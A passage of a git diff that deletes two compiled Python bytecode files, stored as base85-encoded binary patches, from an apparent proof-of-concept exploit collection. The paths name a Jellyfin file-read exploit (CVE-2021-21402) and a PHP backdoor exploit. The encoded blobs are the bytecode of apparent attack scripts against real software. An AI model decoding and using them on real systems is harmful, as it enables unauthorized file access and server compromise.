zAO#9$GcpHKq+lMTM8N{cISLj*mMAz60?i8`%M@G$d4YnJOm-|?H zpPl^rh04Ju@&?=pkH36;`t#F6esKKzlhY?Z7~|{1;SS^qdf6ecaX-sW&0_C<8b&%9 zxq!u4^epzjVjWz!5qZfu(01JR)`B?cn+Sa54TdO*J~tl?TVl}hE%4f0pMMiW+Nce3 zKxsP`O)NsK#-#f?v1!aGd545Wfu;Esw0Yxav(hc9j~w>AJ5<(@4EC$kL3I zN6^}iKNVrq-*Rq8iiZw1oDX-M2TrZps;#%KU2)Lekniz>J3_hZ 
zjcb+0hEu+C>+bdkuREdWbLS@a`|%ZLvzx>N?!Hm2R4Z4nHma3+t?ul4Z7&g1GXvdw zk|%4|J3LaRyIt-DfR5pZNjwr<8u$b4qJ3nxl^F0iRYEskV35!V75ciAHFV7JZg`>O zO{~a3FyWu1@FbPSScfY^rApL1)>3&Yl`TIGxT(?I1b0sRRD7hAcKQCu=R<|tR@OnY zLdH^=NIJ_Sv-J=-H;!?Gn#)jZUeMY)B;uQ^%gb1hnWP4-tB)_;Loe#|JuwoX?pExl z1JpyhH-);D9=P$1kvoii*N+E-ICAw95sEg~dzIl)^CJAbj3FIN#7eAW<(bXq*?DUL zG|yhME?afB!WLQ4G8JlGf}(jELUB;Z+-9}X7YzQf-B3&510lVGkhc!KBoa|a8Y6yI z4XIY3b32mUPZQqEYP^@Jn%cBP)Q(Mp|DF4PJ-lh|+k-erL;kLQ5#%eFN^Hq0v1Q9< Nh3sb+tY^8R{SSY%X_f#0 diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc deleted file mode 100644 index fd50364c76c3bcae7ebbbb970e42179d35f9b9a4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2141 zcmcIlTTdHD6h6DgCKwXPrMb2dirUIAcrm%OjgqQSF1<;#GHp_!NUq~uU}3%M?u-LS zMhZA2kcJR74J5>AN*h{~CWc&;7#xS!{*Ugimxrnkee6SfW^5B^pS$Zl=giERGvAz< z^V##~djH3#7r%@_`SGBB4?l7rg^WJ|G=TOMTYz?<(l0{02#NsR9!LWS%v%Jl3gTX9 z_ky6V2iXI16&#SgAp1~NgS-w^4aj~}wIJ7_Laz;|>OpQmwGre^s5XPV1=TAcZ$-5Y zmcE|6b^1MNPLUxV|A4WkOs7TAq|)xYs+4G3sbKZ>NOMY^K8tSOZBg=jU( zvx-SnL#JM}yVdTbLVajOleEh)37gf@+!AVP-rp2@n+G{+Dp9H&!;jSCsJ{`P;`N!v zMsD$tpBk}a3W<@OIR25MY5g6lZsqgN`Eh6BqLqK@&gJd#30j52dNi)kb*ub%fFp@S zD-Mv2s|FemHHMmlZv{gf1$vw;0bh%;nFl+W)O3#UFWe``Re|B$n6q-{tlT|&c+7pW z;1=c(kA3eOt8lIOIA6@)`R&{gpI~QZOUo5UN34af?a{H~)cHyjEBD}!=a=o=Pfljk zxpUQ8yj9GP6!X`LLks9teDuOzO1s$?Zgv`*?%Xry;gCIl!5$uTvpFk&r4q);jM78KJGQbU`no^=XkU2jOe{E$uVbna5Q20@o?&b& zKeK#p%3ZpMnO(ctOLq1>)MS*MWl3Uq+}%iPZd zDl%?KA&K|^iwETn)0x3!870meb*X4#xCVi5l2&A=tlPOLyrh%fj5yjYN4lw zH8EYx!BNg^>rR`}vn>7(3e zHLxlfF@9zu6SK>Cyf3CCC^B?_p(#N%NGTx0*3Y}nBIEJ3kmJLfnIl^mQE;YL0@wg9 zNE=$x=LE@9>W%81JyEq!MJ*jOV#&CoQzE^u(hrhnB;!P%lrUmacbUOgj7W#7DVRz* zLSj*!`2-XF;Vl^Vb^J&p3aF_Q8bqJq5o(2vqDSxv0dbeGTi7IS7U~7R7+^UHZ$-fi z2tjM=nY|n{=_iyWUsg%4_Ij#Cu7zq}*%JMpe*m{P!9@T7 
diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc deleted file mode 100644 index 22d029369bf4939910b9c56bb54acc97cccdb066..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1918 zcmcIk>rWI{6hAY&?7{+~_(ZFn(Acbvusjl^&(vVm^n)?mY8x7}9p+xxft^R^-od3= zQhe1%1Z=87EgH2DO)SwS)~bv3YyW}%1MSWLpZw52pgs2vsicpOo!xuSIrnkydHqi8 z_xjWqm!5uV!15PE`YsMOhZDiS0tJBHh*zPYfTcpO3RVnyW1uXbh(m82XdDKs-~@nT zt^yJR5{E8Q1tfta38XqAHAqrGYLV0dsYil`8<4C9vIa>bkhMtG0a=e^1CWhKHUVjh z$Yvy4fV>1%0nA2F*dA@&t0a&-0GQ6=d6a66ay+G1IY`(9_Y@(caS5)zY?0s_pTp&gmW;Qat36 zWsx=D;gp8o!lhYFlblp`&@uKJRUmy4_iB1I=Xo^UOVg;Y+)(; z1qEr)zbUFbnb3rjTJZRR)~SWlXS9xPEu5NNymdF684pg)MrJ;rKVNzJWyA+Roe7@Z z#RI~RiTlChhYPpMOIK!o8#^96{W_c;56;~TuH30SIv31c4yNyfb2HJ!aOxrI2``p| z)8)mnQ^DlDN_lo^?CRpP)2M1`?ARejy_Ver)aE?AaXOfJ5MG-N&)#0VdA?FEhbJd1 zICX>7AnkYh^%mlILmUN=5v4`lag4N*TrsTe&t*aA+d1M6%+g;5o-OiBPJ6d)>W9F0Lq0dF^$s;GP9H^|ywW~-oU zG!8ZvXAHP10J0JiHGpvF8m)qnJYebv<4{8A)Itf7QwLb1I5#0q@bwc)Y%~F-1Po&7 zuYw^JydMR2#7Yu|5<1uH6csT)^ZZIHbPHqw)VxxmPbRy0f|Yh&-1S$dc&H$kgUJci+fl zwlfJFAxS(7hDpf2s3Eo)uYOKFhnT)Kta~})TW-3&v-33^JKkiqxc%ZZmwJqX!y<6^ zIJQj|e9AbJc*n*h59Um}-{Ha_#&zzqoZ%2EJ>;~=B_kq@`2%>bXi!(!l@?_hg~4Hw z9@les^J zN=&I$)~NMLQc1;Q@$JesrBPk0G$<)mI+WdlM`eF2n0>8=V_A;9B7_3J=o0RAa#69w zWO`qL=8o!~ZQ27YyA>DZ!!O+WKYWw9e9Ll(U!d=ZzQJC_sZQCT)+s6UF&X`0N%e1> Hnu`4iarqnM